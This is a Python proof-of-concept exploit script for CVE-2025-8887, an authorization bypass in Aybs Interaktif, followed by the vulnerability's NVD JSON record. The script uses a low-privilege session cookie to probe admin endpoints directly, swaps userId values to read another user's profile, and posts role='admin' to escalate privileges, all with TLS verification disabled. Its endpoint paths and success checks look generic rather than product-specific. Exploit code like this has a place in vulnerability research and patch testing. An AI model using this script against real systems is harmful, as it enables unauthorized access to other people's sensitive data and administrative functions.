CVE-2025-8887

# CVE-2025-8887 PoC - Aybs Interaktif Authorization Bypass # Vulnerability: Authorization Bypass Through User-Controlled Key # Affected: Aybs Interaktif 2024 - 28082025 import requests # Target configuration TARGET_URL = "https://target-aybs-app.com" SESSION_COOKIE = "session=YOUR_SESSION_COOKIE" # Low-privilege authenticated session # Step 1: Forceful Browsing - Access admin/restricted endpoints directly def forceful_browsing(): """Attempt to access restricted endpoints via direct URL navigation""" restricted_paths = [ "/admin/dashboard", "/admin/users", "/api/v1/admin/config", "/management/reports", ] headers = {"Cookie": SESSION_COOKIE} for path in restricted_paths: resp = requests.get(f"{TARGET_URL}{path}", headers=headers, verify=False) if resp.status_code == 200: print(f"[+] Accessible without proper authorization: {path}") print(f" Response snippet: {resp.text[:200]}") # Step 2: Parameter Injection - Modify user-controlled keys to access other users' data def parameter_injection(): """Modify userId parameter to access other users' sensitive information""" headers = {"Cookie": SESSION_COOKIE} # Original request (legitimate): GET /api/user/profile?userId=self # Modified request (exploit): GET /api/user/profile?userId=victim_id victim_user_id = "100" # Target user ID resp = requests.get( f"{TARGET_URL}/api/user/profile?userId={victim_user_id}", headers=headers, verify=False ) if resp.status_code == 200 and "victim_data_indicator" in resp.text: print(f"[+] Successfully accessed victim user {victim_user_id} data") print(f" Response: {resp.text}") # Step 3: Input Data Manipulation - Alter input to bypass authorization checks def input_data_manipulation(): """Manipulate form/API input to bypass authorization""" headers = {"Cookie": SESSION_COOKIE, "Content-Type": "application/json"} payload = { "role": "admin", # Privilege escalation via parameter "userId": "1", # Target admin user "action": "view_all" # Force action beyond permission } resp = requests.post( f"{TARGET_URL}/api/records/access", json=payload, headers=headers, verify=False ) if resp.status_code == 200: print(f"[+] Authorization bypassed via input manipulation") print(f" Response: {resp.text}") if __name__ == "__main__": print("[*] CVE-2025-8887 PoC - Aybs Interaktif Authorization Bypass") print("[*] Testing Forceful Browsing...") forceful_browsing() print("\n[*] Testing Parameter Injection...") parameter_injection() print("\n[*] Testing Input Data Manipulation...") input_data_manipulation()

{"cve": {"id": "CVE-2025-8887", "sourceIdentifier": "[email protected]", "published": "2025-10-10T14:15:44.043", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key, Missing Authorization, Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Usta Information Systems Inc. Aybs Interaktif allows Forceful Browsing, Parameter Injection, Input Data Manipulation.This issue affects Aybs Interaktif: from 2024 through 28082025."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0329", "source": "[email protected]"}]}}